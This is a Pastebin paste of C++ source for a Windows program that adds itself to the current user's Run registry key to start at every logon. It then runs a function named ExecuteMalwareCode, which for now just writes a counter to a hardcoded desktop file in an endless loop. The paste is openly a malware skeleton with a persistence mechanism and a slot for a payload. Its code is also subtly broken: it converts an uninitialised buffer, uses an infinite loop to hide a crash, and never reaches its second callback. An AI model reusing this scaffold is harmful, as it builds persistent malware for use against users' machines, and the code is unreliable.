Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #include "framework.h"
- #include "FourthWindowsProgram.h"
- #include <windows.h>
- #include <iostream>
- #include <conio.h>
- #include <fstream>
- #include <streambuf>
- #include <thread>
- #include <ctime>
- #include <sstream>
- #include <string>
- #pragma warning(disable:4996)
- #define APP_NAME L"FourthWindowsProgram"
- #define HARDWARE_UNIQUE_ID_LENGTH 7
- #define RELATIVE_PATH_TO_HARDWARE_UNIQUE_ID "\\hardwareId.txt"
- using namespace std;
- /* Call if you need to remove program from autoRun */
- void RemoveFromAutoRun() {
- HKEY hkey = HKEY_CURRENT_USER;
- RegOpenKey(HKEY_CURRENT_USER, L"SOFTWARE\\Microsoft\\Windows\\Currentversion\\Run", &hkey);
- RegDeleteValue(hkey, APP_NAME);
- RegCloseKey(hkey);
- }
- typedef void (*ProgramPathCallback)(string);
- void getProgramAbsolutePath(ProgramPathCallback callback1, ProgramPathCallback callback2) {
- char myPath[_MAX_PATH + 1];
- wchar_t wtext[MAX_PATH];
- mbstowcs(wtext, myPath, strlen(myPath) + 1);
- LPWSTR ptr = wtext;
- GetModuleFileName(NULL, wtext, _MAX_PATH);
- wstring ws(wtext);
- string programPath = string(ws.begin(), ws.end());
- callback1(programPath);
- callback2(programPath);
- // to get rid of crash error: variable 'ws' is corrupted
- while (1);
- }
- void ExecuteMalwareCode() {
- int var = 100;
- while (1) {
- ::Sleep(1000);
- ofstream myFile;
- myFile.open(L"C:\\Users\\Kostya\\Desktop\\test\\logger2.txt");
- myFile << ++var;
- }
- }
- string getAbsolutePathProgramDir(string path) {
- string lastFolder = "";
- int endIndex = 0;
- bool isCollecting = false;
- for (int i = path.length(); i >= 0; i--) {
- string currChar(1, path[i]);
- if (currChar == "\\") break;
- endIndex++;
- }
- string copyPath = path;
- return copyPath.substr(0, copyPath.length() - endIndex);;
- }
- string getHardwareId(const int len) {
- static const char alphanum[] =
- "0123456789"
- "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
- "abcdefghijklmnopqrstuvwxyz!@#$%^&*()_+-:;/?";
- string tmp_s;
- tmp_s.reserve(len);
- for (int i = 0; i < len; ++i) {
- tmp_s += alphanum[rand() % (sizeof(alphanum) - 1)];
- }
- return tmp_s;
- }
- string getHardwareIdFromFile(string path) {
- string folderWithProgram = getAbsolutePathProgramDir(path);
- string uniqueHardwareIdFilePath = folderWithProgram + RELATIVE_PATH_TO_HARDWARE_UNIQUE_ID;
- ifstream file(uniqueHardwareIdFilePath);
- string id = "";
- getline(file, id);
- return id;
- }
- void CreateFileWithUniqueId(string path) {
- string hardwareId = getHardwareIdFromFile(path);
- if (hardwareId.length() < HARDWARE_UNIQUE_ID_LENGTH) {
- string folderWithProgram = getAbsolutePathProgramDir(path);
- string uniqueHardwareIdFilePath = folderWithProgram + RELATIVE_PATH_TO_HARDWARE_UNIQUE_ID;
- string hardwareId = getHardwareId(HARDWARE_UNIQUE_ID_LENGTH);
- ofstream myFile;
- myFile.open(uniqueHardwareIdFilePath);
- myFile << hardwareId;
- myFile.close();
- }
- }
- void AddToAutoRunCallbackAndExecute(string path)
- {
- wstring progPath(path.begin(), path.end());
- HKEY hkey = NULL;
- LONG createStatus = RegCreateKey(HKEY_CURRENT_USER, L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", &hkey);
- LONG status = RegSetValueEx(hkey, APP_NAME, 0, REG_SZ, (BYTE*)progPath.c_str(), (progPath.size() + 1) * sizeof(wchar_t));
- ExecuteMalwareCode();
- }
- void AddToAutoRunAndExecute() {
- getProgramAbsolutePath(&AddToAutoRunCallbackAndExecute, &CreateFileWithUniqueId);
- }
- int APIENTRY wWinMain(_In_ HINSTANCE hInstance,
- _In_opt_ HINSTANCE hPrevInstance,
- _In_ LPWSTR lpCmdLine,
- _In_ int nCmdShow
- )
- {
- UNREFERENCED_PARAMETER(hPrevInstance);
- UNREFERENCED_PARAMETER(lpCmdLine);
- srand((unsigned)time(NULL) * getpid());
- AddToAutoRunAndExecute();
- return 0;
- }
Advertisement
Advertisement
